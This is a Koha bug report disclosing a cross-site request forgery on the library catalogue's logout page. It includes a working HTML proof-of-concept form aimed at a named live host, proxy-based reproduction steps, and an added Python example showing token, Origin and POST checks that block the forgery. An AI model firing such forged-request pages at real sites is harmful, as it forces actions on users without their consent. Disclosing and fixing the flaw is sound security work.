https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=23238
Bug ID: 23238
Summary: CSRF On Logout Page
Change sponsored?: ---
Product: Koha
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P5 - low
Component: Web services
Assignee: [email protected]
Reporter: [email protected]
QA Contact: [email protected]
Created attachment 91132
--> https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=91132&action=edit
PFA the Google Drive link for the video
Vulnerability: CSRF on logout page
Vulnerability Description: Cross-Site Request Forgery (CSRF) is an attack that
forces an end user to execute unwanted actions on a web application in which
they're currently authenticated. With a little help of social engineering (such
as sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker's choosing.
Vulnerable URL: https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl
CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl">
<input type="hidden" name="logout.x" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps to reproduce:
1. Login with valid credentials
2. Start any proxy tool to intercept the request.
3. Click logout
4. Send to "Repeater"
5. Change "referer" header
6. Observe the output
7. Create an HTML file using the CSRF POC mentioned above
8. Login again
9. Open the CSRF html file on a new tab
10. Submit request
11. Results would reflect on main account
POC:
PFA the video
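The proof of concept above works because the logout action is triggered by a plain form submission (the form has no method attribute, so it sends a GET) and nothing in the request proves it originated from the OPAC itself; step 5 of the reproduction also shows the Referer header can be changed freely. The following is an added example written for this report, not code from Koha or from the reporter: a hypothetical logout handler that requires a POST, checks the Origin/Referer header against the site's own origin, and validates a per-session anti-CSRF token derived with an HMAC. The secret, session id, site origin and request dictionaries are all constructed values for the illustration.

```python
import hashlib
import hmac
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed server-side secret for this example only; a real deployment
# loads it from configuration and never hard-codes it.
SERVER_SECRET = b"example-only-secret"


def make_csrf_token(session_id: str) -> str:
    """Derive a per-session anti-CSRF token (HMAC-SHA256 over the session id).

    The server embeds this value in the logout form; an attacker's page on
    another origin cannot read the victim's session id or token, so it cannot
    forge a request that carries the right value.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token with the expected one."""
    if not token:
        return False
    return hmac.compare_digest(make_csrf_token(session_id), token)


def origin_allowed(headers: dict, site_origin: str) -> bool:
    """Second line of defence: Origin (or, failing that, Referer) must match the site.

    A missing header is treated as untrusted because a forged cross-site
    submission can arrive without one.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == site_origin


def handle_logout(request: dict, session_id: str, site_origin: str) -> Tuple[int, str]:
    """Hypothetical logout handler: logout changes server state, so it is
    accepted only as a POST, only from the site's own origin, and only with
    a valid token for the caller's session."""
    if request["method"] != "POST":
        return 405, "logout must be submitted with POST"
    if not origin_allowed(request["headers"], site_origin):
        return 403, "cross-site request rejected (Origin/Referer mismatch)"
    if not check_csrf_token(session_id, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, "session terminated"


# Constructed sample traffic: the victim's session and the site's own origin.
SITE_ORIGIN = "https://opac.example.test"
VICTIM_SESSION = "sess-0123456789abcdef"


def forged_request() -> dict:
    """Shape of the request the CSRF proof of concept produces: a GET carrying
    logout.x=1, sent from an attacker-controlled page with no token."""
    return {
        "method": "GET",
        "headers": {"Referer": "https://attacker.example.test/poc.html"},
        "form": {"logout.x": "1"},
    }


def legitimate_request() -> dict:
    """A logout submitted from the site's own page with the session's token."""
    return {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"csrf_token": make_csrf_token(VICTIM_SESSION)},
    }


def demo() -> Tuple[int, int]:
    """Run both requests through the handler and return their status codes."""
    forged_status, _ = handle_logout(forged_request(), VICTIM_SESSION, SITE_ORIGIN)
    legit_status, _ = handle_logout(legitimate_request(), VICTIM_SESSION, SITE_ORIGIN)
    return forged_status, legit_status


if __name__ == "__main__":
    print(demo())  # expected: (405, 200)
```

The three checks are deliberately layered: a SameSite cookie attribute or an Origin check alone can be undermined by older browsers or by a missing header, while the per-session token is the control that holds regardless of how the request was delivered. The token here is bound to the session id so that logging out and back in (step 8 of the reproduction) invalidates any token captured earlier.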
--
_______________________________________________
Koha-bugs mailing list
[email protected]
http://lists.koha-community.org/cgi-bin/mailman/listinfo/koha-bugs
website : http://www.koha-community.org/
git : http://git.koha-community.org/
bugs : http://bugs.koha-community.org/